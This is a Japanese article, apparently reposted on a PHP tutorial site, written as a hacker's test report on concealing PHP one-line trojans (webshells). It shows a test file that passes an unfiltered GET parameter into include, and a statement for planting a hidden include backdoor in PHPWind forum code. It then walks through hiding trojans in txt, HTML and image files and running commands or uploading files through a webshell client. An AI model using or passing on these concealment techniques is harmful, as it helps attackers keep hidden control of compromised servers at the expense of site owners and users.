ホームページ  >  記事  >  php教程  >  ハッカーの経験が PHP バックドアの隠しスキル テスト レポートについて語る

ハッカーの経験が PHP バックドアの隠しスキル テスト レポートについて語る

WBOY
WBOYオリジナル
2016-06-21 09:00:461056ブラウズ

最近、多くの友人が、私の 1 文のトロイの木馬を HTML や画像に隠すことができるかどうか私に尋ねてきました。実際、私がどうしても 1 文のトロイの木馬を PHP ファイルに挿入することは、すでにかなり隠されています。 HTML ファイルまたは画像で、この記事のテスト レポートを読み続けましょう。 PHP は拡張子 php を持つファイルのみを解析するため、PHP ステートメントをイメージに挿入しただけでは実行されないことを知っておく必要があります。したがって、画像に隠された PHP ステートメントを実行できる必要があります。 PHP の呼び出し関数 (include、require など) を使用するだけです。

数日前にトロイの木馬を写真に隠すという記事をまだ覚えています。つまり、PHP ファイル内で include("x.gif") などのステートメントを使用して、画像に隠されたトロイの木馬ステートメントを呼び出します。 ASP のステートメントも同様です。非常に隠されているように見えますが、イメージを直接呼び出すと、PHP について少し知っている人であれば、不審な点を見つけるのは難しくありません。 URL の GET メソッドではパラメータを渡すことが難しいため、トロイの木馬挿入のパフォーマンスを最大限に活用できません。

PHP では Include 関数が頻繁に使用されるため、多くのセキュリティ上の問題が発生します。たとえば、PHPWIND1.36 の脆弱性は、include の背後にある変数のフィルタリングが欠如していることが原因です。これから、同様のステートメントを構築して PHP ファイルに挿入できます。次に、トロイの木馬を画像または HTML ファイルに隠します。これは、より隠蔽性が高いと言えます。たとえば、PHPWIND フォーラムに次のステートメントを挿入します。 <''?@include include/.$PHPWIND_ROOT;? 一般管理者はこれを参照できません。

include 関数を使用すると、txt、html、画像ファイルなどのさまざまな種類のファイルに PHP トロイの木馬を隠すことができます。 txt、html、画像ファイルの 3 種類のファイルはフォーラムや記事システムで最も一般的であるため、以下の順序でテストを実行します。

まず、PHP ファイル test.php を作成します。 ファイルの内容は次のとおりです。


$test=$_GET['test'];

@include 'test/' .$test;

?>

Txt ファイルは一般に説明ファイルなので、ディレクトリの説明ファイルに 1 文のトロイの木馬を入れることができます。 TXT ファイル t.txt を作成するだけです。一文のトロイの木馬を t.txt ファイルに貼り付けます。次に、 http://localhost/test/test.php?test=../t.txt にアクセスします。 t.txt の内容が表示されれば、OKです。 Lanker mini PHP バックドア クライアントのトロイの木馬アドレスを http :/ に追加します。 /localhost/test/test.php?test=../t.txt パスワードに cmd を追加するだけで、実行によって返される結果を確認できます。

HTML ファイルの場合、通常はテンプレート ファイルです。 HTML ファイルに挿入されたトロイの木馬を表示せずに呼び出して実行できるようにするには、次のように HTML に隠し属性を持つテキスト ボックスを追加します。 その後、上記と同じ方法を使用します。実行で返される結果は、通常、ソース ファイルを表示することで確認できます。 たとえば、このプログラムのディレクトリを表示する機能を使用します。 C:Uniserver2_7swwwtest としてディレクトリを取得できるので、ソース ファイルの内容を表示します。

次に、画像ファイルについて話しましょう。最も有害な手口は、画像の中にトロイの木馬を隠すことです。画像を直接編集して画像の最後に挿入することができます。

テスト後、通常は画像には影響しません。次に、同じ方法でクライアントのトロイの木馬アドレスを追加します

PHP 環境変数をチェックすると、返される結果は元のイメージです。

ここでの結果と私たちが想像したものには多少の違いがあるかもしれません。実際、コマンドは実行されましたが、返された結果は表示されません。これは実際の G​​IF ファイルであるため、返された結果は表示されません。実際にコマンドが実行されたかどうかを証明するために、upload fileコマンドを実行します。予想どおり、ファイルはサーバーに正常にアップロードされました。このような偽造の利点は、それがよく隠蔽されることです。言うまでもなく、欠点は応答がないことです。返された結果を確認したい場合は、メモ帳を取り出して偽の画像ファイルを作成します。

この時点で、PHP バックドアをどのように非表示にするかはあなたの選択次第です。急いで書いたので間違っているところがあればご指摘ください!



声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。